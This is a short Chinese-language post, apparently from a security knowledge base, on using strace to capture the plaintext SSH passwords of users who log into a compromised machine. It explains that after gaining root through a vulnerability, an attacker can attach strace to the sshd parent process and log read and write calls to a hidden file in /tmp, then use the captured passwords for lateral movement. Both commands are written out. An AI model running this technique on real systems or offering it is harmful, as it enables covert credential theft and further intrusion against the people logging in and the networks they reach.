strace监听ssh来源流量

不只是可以监听连接他人,还可以用来抓到别人连入的密码。应用场景如:通过漏洞获取root权限,但是不知道明文密码在横向扩展中可以使用。

之前有用别名的方式来抓取登陆其他机器时的密码、同样也可以利用strace来监听登陆本地的sshd流量。

ps -ef | grep sshd #父进程PID
strace -f -p 12617 -o /tmp/.ssh.log -e trace=read,write,connect -s 2048

image

image

零组资料文库 all right reserved,powered by 0-sec.org未经授权禁止转载 2020-02-28 17:12:58

results matching ""

    No results matching ""